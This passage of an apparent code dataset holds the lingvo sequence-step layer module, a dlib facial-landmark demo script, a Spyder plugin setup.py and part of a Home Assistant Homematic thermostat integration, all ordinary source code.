All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"An abstract layer for processing sequences step-by-step.\n\nE.g.::\n\n def ProcessSeq(step, external_inputs, input_batch):\n prepared_inputs = step.PrepareExternalInputs(\n step.theta, external_inputs)\n batch_size, T = tf.shape(input_batch.paddings)[:2]\n state = step.ZeroState(\n step.theta, prepared_inputs, batch_size)\n for t in range(T):\n step_inputs = input_batch.Transform(lambda x: x[:, i, ...])\n step_outputs, state = step.FProp(\n step.theta, prepared_inputs, step_inputs, state)\n (processing step_outputs...)\n\"\"\"\n\nimport collections\n\nfrom lingvo import compat as tf\nfrom lingvo.core import base_layer\nfrom lingvo.core import builder_layers\nfrom lingvo.core import py_utils\nfrom lingvo.core import recurrent\n\n\nclass Step(base_layer.BaseLayer):\n \"\"\"A layer that processes input sequences step-by-step.\n\n This can be seen as an RNNCell extended with optional external inputs.\n \"\"\"\n\n def PrepareExternalInputs(self, theta, external_inputs):\n \"\"\"Returns the prepared external inputs, e.g., packed_src for attention.\"\"\"\n if not external_inputs:\n external_inputs = py_utils.NestedMap()\n packed = external_inputs.DeepCopy()\n for name, child in self.children.items():\n child_external_inputs = external_inputs.get(name, py_utils.NestedMap())\n if isinstance(child, (tuple, list)):\n output = []\n for i, sub in enumerate(child):\n if isinstance(sub, Step):\n output.append(\n sub.PrepareExternalInputs(theta[name][i],\n child_external_inputs))\n if output:\n if len(output) != len(child):\n raise ValueError('Expecting child list to be instances of Step.')\n packed[name] = type(child)(output)\n elif isinstance(child, Step):\n packed[name] = child.PrepareExternalInputs(theta[name],\n child_external_inputs)\n return packed\n\n def ZeroState(self, theta, prepared_inputs, batch_size):\n \"\"\"Returns the initial state given external inputs and batch size.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n prepared_inputs: External inputs returned by PrepareExternalInputs().\n batch_size: An int scalar representing the batch size of per-step inputs.\n\n Returns:\n A `.NestedMap` representing the initial state, which can be passed to\n FProp() for processing the first time step.\n \"\"\"\n state0 = py_utils.NestedMap()\n for name, child in self.children.items():\n if isinstance(child, (tuple, list)):\n output = []\n for i, sub in enumerate(child):\n if isinstance(sub, Step):\n output.append(\n sub.ZeroState(theta[name][i], prepared_inputs[name][i],\n batch_size))\n if output:\n if len(output) != len(child):\n raise ValueError('Expecting child list to be instances of Step.')\n state0[name] = type(child)(output)\n elif isinstance(child, Step):\n state0[name] = child.ZeroState(theta[name], prepared_inputs[name],\n batch_size)\n return state0\n\n def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):\n \"\"\"Forward function.\n\n 
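Subclasses implement a single time step here; this base method raises NotImplementedError.\n\n    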
step_inputs, state0, step_outputs, and state1 should each be a `.NestedMap`\n of tensor values. Each tensor must be of shape [batch_size ...]. The\n structure of NestedMaps are determined by the implementation. state0 and\n state1 must have exactly the same structure and tensor shapes.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n prepared_inputs: External inputs returned by PrepareExternalInputs().\n step_inputs: The inputs for this time step.\n padding: A 0/1 float tensor of shape [batch_size]; 1.0 means that this\n batch element is empty in this step.\n state0: The previous recurrent state.\n\n Returns:\n A tuple (step_outputs, state1).\n\n - outputs: The outputs of this step.\n - state1: The next recurrent state.\n \"\"\"\n raise NotImplementedError(type(self))\n\n\nclass StatelessLayerStep(Step):\n \"\"\"Allows BaseLayer subclasses to be used as Steps.\n\n Layers used with this class should be stateless: they should not return\n anything that must be passed back in the next invocation.\n \"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define('layer', None, 'Params for the layer that this step wraps.')\n return p\n\n def __init__(self, params):\n super().__init__(params)\n p = params\n self.CreateChild('layer', p.layer)\n\n def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):\n \"\"\"Perform inference on a stateless layer.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n prepared_inputs: unused.\n step_inputs: A NestedMap containing 'inputs', which are passed directly to\n the layer.\n padding: A 0/1 float tensor of shape [batch_size]; 1.0 means that this\n batch element is empty in this step.\n state0: unused.\n\n Returns:\n (output, state1), where output is the output of the layer, and\n state1 is an empty NestedMap.\n \"\"\"\n del state0\n del prepared_inputs\n args = {}\n if padding is not None:\n args['padding'] = padding\n output = self.layer.FProp(theta.layer, step_inputs.inputs, **args)\n return output, py_utils.NestedMap()\n\n\nclass StackStep(Step):\n \"\"\"A stack of steps.\n\n Each sub-step is assumed to accept step_inputs of type NestedMap(inputs=[])\n and return a primary output of type NestedMap(output=tensor). The\n output of layer n-1 is sent to input of layer n.\n\n Per-step context vectors and per-sequence context vectors can also be\n supplied; see FProp for more details.\n \"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define(\n 'sub', [], 'A list of sub-stack params. Each layer is '\n 'expected to accept its input as NestedMap(inputs=[]), and '\n 'produce output as NestedMap(output=tensor). '\n 'The external_inputs parameter is passed directly to the '\n 'PrepareExternalInputs method of each sub-step. ')\n p.Define(\n 'residual_start', -1, 'An index of the layer where residual '\n 'connections start. Setting this parameter to a negative value turns '\n 'off residual connections.'\n 'More precisely, when i >= residual_start, the output of each step '\n 'is defined as: '\n 'output[i] = output[i - residual_stride] + sub[i](output[i - 1]) '\n 'where output[-1] is the step input.')\n p.Define(\n 'residual_stride', 1, 'If residual connections are active, this '\n 'is the number of layers that each connection skips. 
For '\n 'instance, setting residual_stride = 2 means the output of layer '\n 'n is added to layer n + 2')\n return p\n\n def __init__(self, params):\n super().__init__(params)\n p = params\n self.sub_steps = []\n self.CreateChildren('sub', p.sub)\n\n def PrepareExternalInputs(self, theta, external_inputs):\n \"\"\"Delegates external inputs preparation to sub-layers.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n external_inputs: A `.NestedMap` object. The structure of the internal\n fields is defined by the sub-steps.\n\n Returns:\n A `.NestedMap` containing a pre-processed version of the external_inputs,\n one per sub-step.\n \"\"\"\n packed = py_utils.NestedMap(sub=[])\n for i in range(len(self.sub)):\n packed.sub.append(self.sub[i].PrepareExternalInputs(\n theta.sub[i], external_inputs))\n return packed\n\n def ZeroState(self, theta, prepared_inputs, batch_size):\n \"\"\"Computes a zero state for each sub-step.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n prepared_inputs: An output from PrepareExternalInputs.\n batch_size: The number of items in the batch that FProp will process.\n\n Returns:\n A `.NestedMap` containing a state0 object for each sub-step.\n \"\"\"\n state = py_utils.NestedMap(sub=[])\n for i in range(len(self.sub)):\n state.sub.append(self.sub[i].ZeroState(theta.sub[i], prepared_inputs,\n batch_size))\n return state\n\n def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):\n \"\"\"Performs inference on the stack of sub-steps.\n\n There are three possible ways to feed input to the stack:\n\n * step_inputs.inputs: These tensors are fed only to the lowest layer.\n * step_inputs.context: [Optional] This tensor is fed to every layer.\n * prepared_inputs: [Optional] This tensor is fed to every layer and\n is assumed to stay constant over all steps.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n prepared_inputs: An output from PrepareExternalInputs.\n step_inputs: A `.NestedMap` containing a list called 'inputs', an\n optionally a tensor called 'context'.\n padding: A 0/1 float tensor of shape [batch_size]; 1.0 means that this\n batch element is empty in this step.\n state0: The previous recurrent state.\n\n Returns:\n A tuple (output, state1):\n\n - output: A `.NestedMap` containing the output of the top-most step.\n - state1: The recurrent state to feed to next invocation of this graph.\n \"\"\"\n state1 = py_utils.NestedMap(sub=[])\n inputs = list(step_inputs.inputs)\n # We pretend that the input is the output of layer -1 for the purposes\n # of residual connections.\n residual_inputs = [tf.concat(inputs, axis=1)]\n additional = []\n if 'context' in step_inputs:\n additional.append(step_inputs.context)\n for i in range(len(self.sub)):\n sub_inputs = py_utils.NestedMap(inputs=inputs + additional)\n sub_output, state1_i = self.sub[i].FProp(theta.sub[i],\n prepared_inputs.sub[i],\n sub_inputs, padding,\n state0.sub[i])\n state1.sub.append(state1_i)\n output = sub_output.output\n if i >= self.params.residual_start >= 0:\n # residual_inputs contains the step input at residual_inputs[0].\n assert i + 1 - self.params.residual_stride < len(residual_inputs)\n output += residual_inputs[i + 1 - self.params.residual_stride]\n residual_inputs.append(output)\n inputs = [output]\n return py_utils.NestedMap(output=output), state1\n\n\nclass ParallelStep(Step):\n \"\"\"Runs many steps 
on the same input and concatenates their outputs.\"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define(\n 'sub', [], 'A list of step params. Each step is '\n 'expected to accept its input as NestedMap(inputs=[]), and '\n 'produce output as NestedMap(output=tensor). '\n 'The external_inputs parameter is passed directly to the '\n 'PrepareExternalInputs method of each sub-step. ')\n return p\n\n def __init__(self, params):\n super().__init__(params)\n p = params\n self.CreateChildren('sub', p.sub)\n\n def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):\n \"\"\"Performs inference on N steps at once and concatenates the result.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n prepared_inputs: An output from PrepareExternalInputs.\n step_inputs: A `.NestedMap` containing a list called 'inputs'.\n padding: A 0/1 float tensor of shape [batch_size]; 1.0 means that this\n batch element is empty in this step.\n state0: The previous recurrent state.\n\n Returns:\n A tuple (output, state1):\n\n - output: A `.NestedMap` containing the output of the top-most step.\n - state1: The recurrent state to feed to next invocation of this graph.\n \"\"\"\n state1 = py_utils.NestedMap(sub=[None] * len(self.sub))\n outputs = [None] * len(self.sub)\n\n for i in range(len(self.sub)):\n outputs[i], state1.sub[i] = self.sub[i].FProp(theta.sub[i],\n prepared_inputs.sub[i],\n step_inputs, padding,\n state0.sub[i])\n\n output = py_utils.NestedMap(output=tf.concat(outputs, axis=1))\n return output, state1\n\n\n# signature: A GraphSignature string defining the input and output parameters\n# of this step. For example, (inputs=[a,b])->c means that step_inputs\n# should be NestedMap(inputs=[a,b]), and the output of FProp should be\n# stored in c.\n# external_signature: A GraphSignature string defining the input to\n# PrepareExternalInputs. For example, 'external_inputs.foo' means that\n# the tensor external_inputs.foo should be the 'external_inputs' parameter\n# when calling PrepareExternalInputs on this sub-step.\n# params: The parameters to use when constructing the sub-step.\nSubStep = collections.namedtuple('SubStep',\n ['signature', 'external_signature', 'params'])\n\n\nclass GraphStep(Step):\n r\"\"\"A step that connects sub-steps in a simple data flow graph.\n\n This is an adaptation of builder_layers.GraphLayer to support steps.\n\n Params.sub specifies a list of Specs that define each sub-step.\n\n A spec contains:\n\n * step_inputs: The signature describing how to assemble the input and output\n for this step. The input part describes the 'step_inputs' parameter,\n while the output part describes the name of the output. The state0\n input and state1 output are handled automatically and should not be\n specified.\n * external_inputs: if this Step requires external_inputs, this\n is the signature describing how to find those inputs.\n This value can also be set to None.\n * params: the params used to construct the sub-step.\n\n The format of signature strings is defined in detail in the GraphSignature\n class documentation.\n\n All inputs to a layer must have been produced by some previous layer. No\n cycles are allowed. All outputs must be uniquely named; no overwriting\n of previous names is allowed.\n\n Example\n ('(act=[layer_0.output,step_inputs.context])->layer_1',\n 'external_inputs.extra',\n step_params)\n\n This constructs the step defined by step_params. 
Its FProp method will be\n called with {act=[layer_0.output,step_inputs.context]} as the step_inputs\n parameter. Its PrepareExternalInputs method will be called with\n 'external_inputs.extra' as the external_inputs parameter. The output of that\n method will be passed to ZeroState and FProp.\n \"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define('output_signature', '', 'Signature of the step output.')\n p.Define('sub', [], 'A list of SubSteps (defined above).')\n p.Define('dict_type', py_utils.NestedMap, 'Type of nested dicts.')\n return p\n\n _seq = collections.namedtuple(\n '_Seq', ['name', 'signature', 'external_signature', 'step'])\n\n def __init__(self, params):\n super().__init__(params)\n p = self.params\n assert p.name\n self._seq = []\n for i, (signature, external_signature, sub_params) in enumerate(p.sub):\n assert signature\n sig = builder_layers.GraphSignature(signature)\n assert len(sig.inputs) == 1\n assert sig.outputs\n external_sig = None\n if external_signature:\n external_sig = builder_layers.GraphSignature(external_signature)\n assert len(external_sig.inputs) == 1\n assert not external_sig.outputs\n name = sub_params.name\n if not name:\n name = '%s_%02d' % (sig.outputs[0], i)\n sub_params.name = name\n self.CreateChild(name, sub_params)\n self._seq.append(\n GraphStep._seq(name, sig, external_sig, self.children[name]))\n self.output_signature = builder_layers.GraphSignature(p.output_signature)\n\n def PrepareExternalInputs(self, theta, external_inputs):\n \"\"\"Prepares external inputs for each sub-step.\n\n The external_inputs parameter of this method is processed by the\n external_inputs of each sub-step, then processed by the sub-step's\n PrepareExternalInputs method.\n\n Args:\n theta: variables used by sub-steps.\n external_inputs: A NestedMap of [n_batch, ...] tensors.\n\n Returns:\n A NestedMap of prepared inputs, where the keys are the names of\n each sub-step.\n \"\"\"\n graph_tensors = builder_layers.GraphTensors()\n graph_tensors.StoreTensor('external_inputs', external_inputs)\n prepared_inputs = py_utils.NestedMap()\n with tf.name_scope(self.params.name):\n for seq in self._seq:\n if seq.external_signature:\n template = py_utils.NestedMap(inputs=seq.external_signature.inputs)\n packed = template.Transform(graph_tensors.GetTensor)\n seq_external_inputs = packed.inputs[0]\n prepared_inputs[seq.name] = seq.step.PrepareExternalInputs(\n theta[seq.name], seq_external_inputs)\n else:\n prepared_inputs[seq.name] = py_utils.NestedMap()\n return prepared_inputs\n\n def ZeroState(self, theta, prepared_inputs, batch_size):\n \"\"\"Creates a zero state NestedMap for this step.\n\n Args:\n theta: variables used by sub-steps.\n prepared_inputs: Output from a call to PrepareExternalInputs.\n batch_size: The number of items in the batch that FProp will process.\n\n Returns:\n A NestedMap of ZeroState results for each sub-step.\n \"\"\"\n state0 = py_utils.NestedMap()\n with tf.name_scope(self.params.name):\n for seq in self._seq:\n state0[seq.name] = seq.step.ZeroState(theta[seq.name],\n prepared_inputs[seq.name],\n batch_size)\n return state0\n\n def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):\n \"\"\"A single inference step for this step graph.\n\n Args:\n theta: variables used by sub-steps.\n prepared_inputs: A NestedMap containing external_inputs that were\n pre-processed by the PrepareExternalInputs method of each sub-step. The\n keys are the names of the sub-steps.\n step_inputs: A NestedMap of [batch, ...] tensors. 
The structure of this\n depends on the graph implementation.\n padding: A 0/1 float tensor of shape [batch_size]; 1.0 means that this\n batch element is empty in this step.\n state0: A NestedMap of state variables produced by either ZeroState or a\n previous invocation of this FProp step. The keys are the names of the\n sub-steps.\n\n Returns:\n (output, state1), both of which are NestedMaps.\n output is implementation-dependent and is defined by the output_signature\n parameter.\n state1 is a NestedMap where the keys are names of sub-steps and the values\n are state outputs from their FProp methods.\n \"\"\"\n p = self.params\n graph_tensors = builder_layers.GraphTensors()\n graph_tensors.StoreTensor('prepared_inputs', prepared_inputs)\n graph_tensors.StoreTensor('step_inputs', step_inputs)\n state1 = py_utils.NestedMap()\n with tf.name_scope(p.name):\n for seq in self._seq:\n tf.logging.vlog(1, 'GraphStep: call %s', seq.name)\n external = None\n if seq.external_signature:\n external = prepared_inputs[seq.name]\n template = py_utils.NestedMap(inputs=seq.signature.inputs)\n packed = template.Transform(graph_tensors.GetTensor)\n input_args = packed.inputs[0]\n out, seq_state1 = seq.step.FProp(theta[seq.name], external, input_args,\n padding, state0[seq.name])\n graph_tensors.StoreTensor(seq.signature.outputs[0], out)\n state1[seq.name] = seq_state1\n template = py_utils.NestedMap(inputs=self.output_signature.inputs)\n output_tensors = template.Transform(graph_tensors.GetTensor).inputs[0]\n return output_tensors, state1\n\n\nclass IteratorStep(Step):\n \"\"\"An iterator over the time dimension of some tensors.\n\n It's common to have a tensor of shape [batch, time, ...] or\n [time, batch, ...]. This object will step through the time dimension,\n producing tensors of shape [batch, ...] in succession.\n\n The input tensors are passed to PrepareExternalInputs. The step_inputs\n argument of FProp is unused.\n \"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define('axis', 1, 'The time dimension of the tensors.')\n return p\n\n def PrepareExternalInputs(self, theta, external_inputs):\n \"\"\"Prepares the input for iteration.\n\n Args:\n theta: unused.\n external_inputs: A NestedMap containing tensors. 
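Each value is typically shaped [batch, time, ...] or [time, batch, ...]. 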
The time axis of each\n tensor should be params.axis.\n\n Returns:\n A prepared NestedMap (current the same as the input).\n \"\"\"\n return external_inputs\n\n def ZeroState(self, theta, prepared_inputs, batch_size):\n \"\"\"Returns the initial iterator state.\n\n Args:\n theta: unused.\n prepared_inputs: Output from a call to PrepareExternalInputs.\n batch_size: The number of items in the batch that FProp will process.\n\n Returns:\n An initial state NestedMap.\n \"\"\"\n return py_utils.NestedMap(t=tf.constant(0, dtype=tf.int32))\n\n def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):\n \"\"\"Returns a A single inference step for this step graph.\n\n Args:\n theta: unused.\n prepared_inputs: Output from a call to PrepareExternalInputs.\n step_inputs: unused.\n padding: unused.\n state0: A NestedMap of state variables produced by either ZeroState or a\n previous invocation of this FProp step.\n\n Returns:\n (output, state1), both of which are NestedMaps.\n output is implementation-dependent and is defined by the output_signature\n parameter.\n state1 is a NestedMap where the keys are names of sub-steps and the values\n are state outputs from their FProp methods.\n \"\"\"\n del theta\n del step_inputs\n del padding\n\n def _Slice(tensor):\n \"\"\"Return a slice of this tensor at time=state0.t.\"\"\"\n shape = py_utils.GetShape(tensor)\n # All zeros except for t in the time dimension.\n # e.g. if params.axis=1, begin is [0, t, 0, 0, 0, ...]\n begin = tf.one_hot(self.params.axis, tf.rank(tensor), on_value=state0.t)\n # Same as shape, but with a 1 in the time dimension.\n # e.g. if params.axis=1, shape is [shape[0], 1, shape[2], shape[3], ...]\n size = tf.concat([\n shape[0:self.params.axis],\n tf.constant([1], dtype=tf.int32), shape[self.params.axis + 1:]\n ],\n axis=0)\n # Make a slice where the time dimension is fixed at state0.t.\n time_slice = tf.slice(tensor, begin, size)\n # Remove the time dimension.\n return tf.squeeze(time_slice, axis=self.params.axis)\n\n output = prepared_inputs.Transform(_Slice)\n state1 = py_utils.NestedMap(t=state0.t + 1)\n return output, state1\n\n\nclass RecurrentStepWrapper(base_layer.BaseLayer):\n \"\"\"A layer that wraps a step in a recurrent.Recurrent call.\"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define('step', None, 'The step params that this class wraps.')\n return p\n\n def __init__(self, params):\n super().__init__(params)\n self.CreateChild('step', self.params.step)\n\n def _CreateChildrenVariables(self):\n # Backwards compatibility: manually call child.InstantiateVariables()\n # outside of tf.variable_scope(p.name).\n self.step.InstantiateVariables()\n super()._CreateChildrenVariables()\n\n def PrepareExternalInputs(self, theta, external_inputs):\n \"\"\"See Step.PrepareExternalInputs.\"\"\"\n return self.step.PrepareExternalInputs(theta.step, external_inputs)\n\n def ZeroState(self, theta, prepared_inputs, batch_size):\n \"\"\"See Step.ZeroState.\"\"\"\n return self.step.ZeroState(theta.step, prepared_inputs, batch_size)\n\n def FProp(self, theta, prepared_inputs, inputs, padding, state0, **kwargs):\n \"\"\"Runs a Step layer over multiple timesteps using Recurrent.\n\n Args:\n theta: A NestedMap containing weights' values of this layer and its\n children layers.\n prepared_inputs: External inputs returned by Step.PrepareExternalInputs().\n inputs: A NestedMap of inputs of shape [time, batch_size, dim].\n padding: A 0/1 float tensor of shape [time, batch_size]; 1.0 means that\n this batch element is 
empty in this step.\n state0: A NestedMap containing the initial recurrent state.\n **kwargs: Additional kwargs to pass to Recurrent.\n\n Returns:\n A tuple (outputs, state1).\n\n - outputs: A NestedMap containing the accumulated outputs of all steps,\n containing Tensors shaped [time, batch_size, dim].\n - state1: A NestedMap containing the accumulated recurrent states,\n containing Tensors shaped [time, batch_size, dim].\n \"\"\"\n\n def RnnStep(recurrent_theta, recurrent_state0, recurrent_inputs):\n \"\"\"Compute a single timestep.\"\"\"\n output, state1 = self.step.FProp(\n theta=recurrent_theta.theta,\n prepared_inputs=recurrent_theta.prepared_inputs,\n step_inputs=recurrent_inputs.inputs,\n padding=recurrent_inputs.padding,\n state0=recurrent_state0.state)\n recurrent_state1 = py_utils.NestedMap(output=output, state=state1)\n return recurrent_state1, py_utils.NestedMap()\n\n # In order to pass Step outputs through Recurrent, they need to be\n # included as part of state.\n output0, _ = self.step.FProp(theta.step, prepared_inputs,\n inputs.Transform(lambda x: x[0]), padding[0],\n state0)\n\n accumulated_states, _ = recurrent.Recurrent(\n theta=py_utils.NestedMap(\n theta=theta.step, prepared_inputs=prepared_inputs),\n state0=py_utils.NestedMap(output=output0, state=state0),\n inputs=py_utils.NestedMap(inputs=inputs, padding=padding),\n cell_fn=RnnStep,\n **kwargs)\n\n return accumulated_states.output, accumulated_states.state\n"} {"ext": "py", "sha": "1a2f639f66ea104a409626485e774ec7720d7bf6", "content": "# USAGE\n# python facial_landmarks.py --shape-predictor shape_predictor_68_face_landmarks.dat --image images/example_01.jpg\n\n# import the necessary packages\nfrom imutils import face_utils\nimport numpy as np\nimport argparse\nimport imutils\nimport dlib\nimport cv2\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--shape-predictor\", required=True,\n\thelp=\"path to facial landmark predictor\")\nap.add_argument(\"-i\", \"--image\", required=True,\n\thelp=\"path to input image\")\nargs = vars(ap.parse_args())\n\n# initialize dlib's face detector (HOG-based) and then create\n# the facial landmark predictor\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(args[\"shape_predictor\"])\n\n# load the input image, resize it, and convert it to grayscale\nimage = cv2.imread(args[\"image\"])\nimage = imutils.resize(image, width=500)\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# detect faces in the grayscale image\nrects = detector(gray, 1)\n\n# loop over the face detections\nfor (i, rect) in enumerate(rects):\n\t# determine the facial landmarks for the face region, then\n\t# convert the facial landmark (x, y)-coordinates to a NumPy\n\t# array\n\tshape = predictor(gray, rect)\n\tshape = face_utils.shape_to_np(shape)\n\n\t# convert dlib's rectangle to a OpenCV-style bounding box\n\t# [i.e., (x, y, w, h)], then draw the face bounding box\n\t(x, y, w, h) = face_utils.rect_to_bb(rect)\n\tcv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n\t# show the face number\n\tcv2.putText(image, \"Face #{}\".format(i + 1), (x - 10, y - 10),\n\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n\n\t# loop over the (x, y)-coordinates for the facial landmarks\n\t# and draw them on the image\n\tfor (x, y) in shape:\n\t\tcv2.circle(image, (x, y), 1, (0, 0, 255), -1)\n\n# show the output image with the face detections + facial landmarks\ncv2.imshow(\"Output\", image)\ncv2.waitKey(0)"} {"ext": "py", 
"sha": "1a2f641584a08008ee532ab93c06ced2336e4710", "content": "# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------------\n# Copyright © 2021, Spyder Bot\n#\n# Licensed under the terms of the MIT license\n# ----------------------------------------------------------------------------\n\"\"\"\nStatus bar widgets setup.\n\"\"\"\nfrom setuptools import find_packages\nfrom setuptools import setup\n\nfrom status_bar_widgets import __version__\n\n\nsetup(\n # See: https://setuptools.readthedocs.io/en/latest/setuptools.html\n name=\"status-bar-widgets\",\n version=__version__,\n author=\"Spyder Bot\",\n author_email=\"spyder.python@gmail.com\",\n description=\"Example that shows how to add wigets to the status bar\",\n license=\"MIT license\",\n url=\"https://github.com/spyder-bot/status-bar-widgets\",\n python_requires='>= 3.7',\n install_requires=[\n \"qtpy\",\n \"qtawesome\",\n \"spyder>=5.1.1\",\n ],\n packages=find_packages(),\n entry_points={\n \"spyder.plugins\": [\n \"status_bar_widgets = status_bar_widgets.spyder.plugin:StatusbarWidgets\"\n ],\n },\n classifiers=[\n \"Operating System :: MacOS\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Education\",\n \"Intended Audience :: Science/Research\",\n \"Intended Audience :: Developers\",\n \"Topic :: Scientific/Engineering\",\n ],\n)\n"} {"ext": "py", "sha": "1a2f642f91ccc54a3e54b279bb474d03a514954f", "content": "\"\"\"Support for Homematic thermostats.\"\"\"\nimport logging\n\nfrom homeassistant.components.climate import ClimateDevice\nfrom homeassistant.components.climate.const import (\n HVAC_MODE_AUTO,\n HVAC_MODE_HEAT,\n HVAC_MODE_OFF,\n PRESET_BOOST,\n PRESET_COMFORT,\n PRESET_ECO,\n SUPPORT_PRESET_MODE,\n SUPPORT_TARGET_TEMPERATURE,\n)\nfrom homeassistant.const import ATTR_TEMPERATURE, TEMP_CELSIUS\n\nfrom . import ATTR_DISCOVER_DEVICES, HM_ATTRIBUTE_SUPPORT, HMDevice\n\n_LOGGER = logging.getLogger(__name__)\n\nHM_TEMP_MAP = [\"ACTUAL_TEMPERATURE\", \"TEMPERATURE\"]\n\nHM_HUMI_MAP = [\"ACTUAL_HUMIDITY\", \"HUMIDITY\"]\n\nHM_PRESET_MAP = {\n \"BOOST_MODE\": PRESET_BOOST,\n \"COMFORT_MODE\": PRESET_COMFORT,\n \"LOWERING_MODE\": PRESET_ECO,\n}\n\nHM_CONTROL_MODE = \"CONTROL_MODE\"\nHMIP_CONTROL_MODE = \"SET_POINT_MODE\"\n\nSUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE\n\n\ndef setup_platform(hass, config, add_entities, discovery_info=None):\n \"\"\"Set up the Homematic thermostat platform.\"\"\"\n if discovery_info is None:\n return\n\n devices = []\n for conf in discovery_info[ATTR_DISCOVER_DEVICES]:\n new_device = HMThermostat(conf)\n devices.append(new_device)\n\n add_entities(devices)\n\n\nclass HMThermostat(HMDevice, ClimateDevice):\n \"\"\"Representation of a Homematic thermostat.\"\"\"\n\n @property\n def supported_features(self):\n \"\"\"Return the list of supported features.\"\"\"\n return SUPPORT_FLAGS\n\n @property\n def temperature_unit(self):\n \"\"\"Return the unit of measurement that is used.\"\"\"\n return TEMP_CELSIUS\n\n @property\n def hvac_mode(self):\n \"\"\"Return hvac operation ie. 
heat, cool mode.\n\n Need to be one of HVAC_MODE_*.\n \"\"\"\n if self.target_temperature <= self._hmdevice.OFF_VALUE + 0.5:\n return HVAC_MODE_OFF\n if \"MANU_MODE\" in self._hmdevice.ACTIONNODE:\n if self._hm_control_mode == self._hmdevice.MANU_MODE:\n return HVAC_MODE_HEAT\n return HVAC_MODE_AUTO\n\n # Simple devices\n if self._data.get(\"BOOST_MODE\"):\n return HVAC_MODE_AUTO\n return HVAC_MODE_HEAT\n\n @property\n def hvac_modes(self):\n \"\"\"Return the list of available hvac operation modes.\n\n Need to be a subset of HVAC_MODES.\n \"\"\"\n if \"AUTO_MODE\" in self._hmdevice.ACTIONNODE:\n return [HVAC_MODE_AUTO, HVAC_MODE_HEAT, HVAC_MODE_OFF]\n return [HVAC_MODE_HEAT, HVAC_MODE_OFF]\n\n @property\n def preset_mode(self):\n \"\"\"Return the current preset mode, e.g., home, away, temp.\"\"\"\n if self._data.get(\"BOOST_MODE\", False):\n return \"boost\"\n\n # Get the name of the mode\n mode = HM_ATTRIBUTE_SUPPORT[HM_CONTROL_MODE][1][self._hm_control_mode]\n mode = mode.lower()\n\n # Filter HVAC states\n if mode not in (HVAC_MODE_AUTO, HVAC_MODE_HEAT):\n return None\n return mode\n\n @property\n def preset_modes(self):\n \"\"\"Return a list of available preset modes.\"\"\"\n preset_modes = []\n for mode in self._hmdevice.ACTIONNODE:\n if mode in HM_PRESET_MAP:\n preset_modes.append(HM_PRESET_MAP[mode])\n return preset_modes\n\n @property\n def current_humidity(self):\n \"\"\"Return the current humidity.\"\"\"\n for node in HM_HUMI_MAP:\n if node in self._data:\n return self._data[node]\n\n @property\n def current_temperature(self):\n \"\"\"Return the current temperature.\"\"\"\n for node in HM_TEMP_MAP:\n if node in self._data:\n return self._data[node]\n\n @property\n def target_temperature(self):\n \"\"\"Return the target temperature.\"\"\"\n return self._data.get(self._state)\n\n def set_temperature(self, **kwargs):\n \"\"\"Set new target temperature.\"\"\"\n temperature = kwargs.get(ATTR_TEMPERATURE)\n if temperature is None:\n return None\n\n self._hmdevice.writeNodeData(self._state, float(temperature))\n\n def set_hvac_mode(self, hvac_mode):\n \"\"\"Set new target hvac mode.\"\"\"\n if hvac_mode == HVAC_MODE_AUTO:\n self._hmdevice.MODE = self._hmdevice.AUTO_MODE\n elif hvac_mode == HVAC_MODE_HEAT:\n self._hmdevice.MODE = self._hmdevice.MANU_MODE\n elif hvac_mode == HVAC_MODE_OFF:\n self._hmdevice.turnoff()\n\n def set_preset_mode(self, preset_mode: str) -> None:\n \"\"\"Set new preset mode.\"\"\"\n if preset_mode == PRESET_BOOST:\n self._hmdevice.MODE = self._hmdevice.BOOST_MODE\n elif preset_mode == PRESET_COMFORT:\n self._hmdevice.MODE = self._hmdevice.COMFORT_MODE\n elif preset_mode == PRESET_ECO:\n self._hmdevice.MODE = self._hmdevice.LOWERING_MODE\n\n @property\n def min_temp(self):\n \"\"\"Return the minimum temperature.\"\"\"\n return 4.5\n\n @property\n def max_temp(self):\n \"\"\"Return the maximum temperature.\"\"\"\n return 30.5\n\n @property\n def target_temperature_step(self):\n \"\"\"Return the supported step of target temperature.\"\"\"\n return 0.5\n\n @property\n 